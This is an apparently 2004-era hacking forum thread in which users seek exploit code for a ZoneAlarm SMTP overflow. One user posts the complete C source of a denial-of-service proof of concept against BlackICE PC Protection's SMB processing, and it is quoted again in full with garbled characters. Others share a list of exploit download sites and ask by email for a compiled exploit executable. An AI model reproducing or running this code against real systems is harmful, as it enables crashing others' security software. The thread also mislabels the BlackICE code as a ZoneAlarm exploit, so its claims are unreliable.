[SecureD]

ZoneAlarm 4.x SMTP Processing Buffer Overflow Vulnerability


somebody got the code already so i can try to compile! :P

[invisible-boy]

me2 but send source code here,it's easy (compile)

[sp00geD]

i think hxxp://www.k-oitk.com has it

[R0x0r]

Doesn't work for me... The site.

[DaClueless]

R0x0r, on Feb 26 2004, 03:54 PM, said:

Doesn't work for me... The site.

Here is a DOS version:

/* RS/BlackICE SMB Processing Overflow Vulnerability      */
/* PoC - DOS @ 'BlackICE PC Protection 3.6 ccb'           */
/* happy coding - wanted_bsd_but_just_got_@linuxmail.org  */
/*                                                        */
/* ...code by aZZe               */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char smbxreq[] = {
  0x00, 0x00, 0x01, 0x79, 0xff, 0x53, 0x4d, 0x42,
  0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00,
  0xff, 0xff, 0x01, 0x00, 0x0d, 0xff, 0x00, 0x00,
  0x00, 0x04, 0x11, 0x0a, 0x00, 0x01, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c,
  0x01, 0x42, 0x42, 
  /* 300 byte  */
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x00, 
  0x54, 0x48, 0x41, 0x4e, 0x4b, 0x00, 0x59, 0x4f,
  0x55, 0x00, 0x49, 0x53, 0x53, 0x00 
};

int main(int clac, char *cla[])
{
  int sd,x;
  struct sockaddr_in ad;

  if(clac<2){ printf("%s: <ip> <port>\n",cla[0]); return 0; }

  ad.sin_addr.s_addr=inet_addr(cla[1]);
  ad.sin_port=htons(atoi(cla[2]));
  ad.sin_family=2;

  sd=socket(2, 1, 0);if(!sd) printf("no socks\n");
  if(connect(sd,(const struct sockaddr *)&ad,sizeof(ad))!=0)
     printf("no connection\n");
  if((x=send(sd,smbxreq,381,0))<0) {
     printf("no sending\n");
  }
  
  printf("%d bytes on their way to freedom...\n",x);
  close (sd);

  return 0;
}
/* EOF biceZZ.c */

[guufa]

niemic, on Mar 5 2004, 07:49 AM, said:

/* RS/BlackICE SMB Processing Overflow Vulnerability � � �*/
/* PoC - DOS @ 'BlackICE PC Protection 3.6 ccb' � � � � � */
/* happy coding - wanted_bsd_but_just_got_@linuxmail.org �*/
/* � � � � � � � � � � � � � � � � � � � � � � � � � � � �*/
/* ...code by aZZe � � � � � � � */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char smbxreq[] = {
 �0x00, 0x00, 0x01, 0x79, 0xff, 0x53, 0x4d, 0x42,
 �0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
 �0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 �0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00,
 �0xff, 0xff, 0x01, 0x00, 0x0d, 0xff, 0x00, 0x00,
 �0x00, 0x04, 0x11, 0x0a, 0x00, 0x01, 0x00, 0x00,
 �0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00,
 �0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c,
 �0x01, 0x42, 0x42, 
 �/* 300 byte �*/
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
 �0x41, 0x41, 0x41, 0x00, 
 �0x54, 0x48, 0x41, 0x4e, 0x4b, 0x00, 0x59, 0x4f,
 �0x55, 0x00, 0x49, 0x53, 0x53, 0x00 
};

int main(int clac, char *cla[])
{
 �int sd,x;
 �struct sockaddr_in ad;

 �if(clac<2){ printf("%s: <ip> <port>\n",cla[0]); return 0; }

 �ad.sin_addr.s_addr=inet_addr(cla[1]);
 �ad.sin_port=htons(atoi(cla[2]));
 �ad.sin_family=2;

 �sd=socket(2, 1, 0);if(!sd) printf("no socks\n");
 �if(connect(sd,(const struct sockaddr *)&ad,sizeof(ad))!=0)
 � � printf("no connection\n");
 �if((x=send(sd,smbxreq,381,0))<0) {
 � � printf("no sending\n");
 �}
 �
 �printf("%d bytes on their way to freedom...\n",x);
 �close (sd);

 �return 0;
}
/* EOF biceZZ.c */

This is code is for BlackIce exploit, the researched is ZoneAlarm 4.x SMTP Processing Buffer Overflow Vulnerability.

[supermax]

Well is k-optik don't ahve it may be on securityfocus.com or jsut look using google

there is a lsit of site when u can find exploit...

hxxp://www.illmob.org/0day/
hxxp://fux0r.phathookups.com/incoming/
hxxp://members.lycos.co.uk/r34ct/
hxxp://www.w00w00.org/files/
hxxp://www.phreak.org/archives/exploits/
hxxp://www.anyside.com/exploits/remote/leak-sploit.c
hxxp://x82.inetcop.org/h0me/c0de/
hxxp://0days.tk/

[zola]

:rolleyes: anyone know how i can get jill.exe . i tried to compile jill.c numerous ways, from borland, vc++ to emac, but the linux application can't run on windows except i format the diskette.

it works for office writer but i had not test on application.
i also tried to download devc++ but the file is too big and my computer slowing down.

[jtevermore]

zola,

just give me a place i can send it, i get it to you

[zola]

jvetermore, you are really something.

you can send it through my e-mail, zol@chelsea-mad.co.uk

i hope i can pay you back

[greatdane]

jtevermore, on Mar 9 2004, 07:52 AM, said:

zola,

just give me a place i can send it, i get it to you

<{POST_SNAPBACK}>

could u pleace send jill.exe to me to plz, greatdane4k@yahoo.com

every time i try to compile, no works :(

[EviL]

jtevermore, on Mar 9 2004, 07:52 AM, said:

zola,

just give me a place i can send it, i get it to you

<{POST_SNAPBACK}>

can u sent me too pliz? :)

fede.suxac@gmail.com

tnx :D

[vnet576]

Whats this with people posting their emails to get compiled code? Thats not what this board is about. If you have problems compiling code then post what line the compiler is giving you errors with. Don't blatantly request the exe and ask people to mail it to you.

Those who requested and posted their email email addresses will get a warning point. If anyone posts the compiled exe in this topic, they will recieve 2 warning points. :angry:

[toe]

ok ive got a problem. Dev C++ latest version i getogn the error:
unrecognized command line option "-fdollar-in-identifiers"
its crap and really anoying.

-toe